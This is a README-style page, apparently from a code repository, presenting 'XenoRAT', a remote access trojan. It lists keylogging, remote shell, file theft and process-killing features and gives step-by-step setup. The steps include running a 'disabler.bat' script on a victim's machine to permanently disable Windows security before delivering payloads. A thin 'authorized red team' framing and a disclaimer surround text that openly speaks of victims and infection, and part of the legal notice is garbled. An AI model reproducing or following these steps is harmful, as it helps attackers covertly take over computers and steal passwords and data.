XenoRAT is an advanced C2 (Command & Control) framework designed for red team operations,
enabling stealthy persistence, lateral movement, and post-exploitation in
authorized engagements.
XenoRAT is a sophisticated Remote Access Trojan (RAT) used by cybercriminals and advanced persistent threat (APT) groups to infiltrate and control target systems. Once deployed on an infected machine, XenoRAT grants the attacker full remote control, enabling them to conduct a wide range of malicious activities without the knowledge or consent of the user. Typically, XenoRAT is employed for espionage, data theft, and surveillance, making it a highly dangerous tool for cybercriminals seeking to exfiltrate sensitive information or disrupt organizational operations.
- 🔒 Secure Encrypted Communications: XenoRAT employs robust encryption protocols to secure the communication between the compromised system and the attacker's command-and-control (C2) server, ensuring stealthy and secure remote access.
- 🖥️ Remote Desktop Control: Attackers can take full control of the infected system’s desktop, allowing them to operate the device as though they were physically present, without detection.
- 📁 File System Management: XenoRAT enables attackers to browse, upload, download, and manipulate files on the victim’s system, facilitating data theft or the deployment of additional malicious payloads.
- 🔄 Process Management: The malware provides the ability to monitor and control running processes on the infected system, including terminating security software or executing malicious processes.
- 📊 System Monitoring: XenoRAT allows real-time monitoring of system activity, gathering critical data such as hardware specifications, running applications, and network activity to help attackers adjust their tactics.
- 🛠️ Remote Shell Access: Attackers can gain command-line access to the system, enabling them to execute arbitrary commands and scripts, further compromising the target’s security.
- 📝 Keylog Management: XenoRAT can log keystrokes on the infected machine, allowing attackers to capture sensitive information like passwords, messages, and other confidential data.
- 🔌 Plugin Support: The malware supports modular plugins, enabling the attacker to add new capabilities to the RAT, such as additional surveillance tools, backdoors, or advanced exfiltration methods.
- 🌐 Cross-Platform Compatibility: XenoRAT is designed to work across a wide range of operating systems, including Windows, macOS, and Linux, making it a versatile tool for attackers targeting diverse environments.
-
Clone the repository into your desired directory:
git clone https://github.com/jcrvnx/XenoRAT.git
-
After cloning, navigate into the XenoRAT directory using your command line interface (like Git Bash, Command Prompt, or PowerShell):
cd XenoRAT -
Run
disabler.batas Administrator to disable Windows security measures:- For the attacker's machine: Manually disable real-time protection to avoid detection during compilation.
- For the target machine: Required to bypass security protections on the victim's system.
# Right-click disabler.bat and select "Run as administrator" disabler.bat
This script (Disabler.bat) is designed to permanently disable security measures (including real-time protection) on a target Windows machine, allowing further payload deployment.
Before operation, ensure your own machine has:
- Real-time protection manually disabled
- Security software temporarily turned off
Failure to do this may result in your system quarantining the malicious files during development/transfer.
-
First Execution
RunDisabler.baton the victim's system to:- This will automatically erase, disable and bypass the security measures and other protections PERMANENTLY.
-
Payload Delivery
Only after successful execution ofDisabler.batshould you:- Transfer/execute additional malicious files
- Begin further exploitation
- Then you can able to delete the malicious file as it was being injected the victims computer.
-
The script will require a system reboot to apply the changes. Allow your system to restart.
-
After the system reboots, navigate back to the XenoRAT directory and run the server executable:
# Double-click xeno-rat-server.exe or run it from the command line xeno rat server.exe -
Done. Enjoy the show.
INFECTING MY OWN PC with XENO RAT
🐀XenoRAT(Remote Administration Tool)
OPERATION SECURITY NOTICE:
- Unauthorized Access is ILLEGAL: Using this tool and wordlist against networks you do NOT own or have explicit written permission to test is a CRIMIN Prevention Act) and moAL OFFENSE in the Philippines (RA 10175 Cybercrimest other jurisdictions.
- NO RESPONSIBILITY: The creators and contributors of this guide
XenoRATrepository are NOT RESPONSIBLE for any illegal activities, misuse, or damage caused by these tools. - USE AT YOUR OWN EXTREME RISK: You are solely responsible for your actions. Understand the laws and ethical implications before proceeding. Think before you type.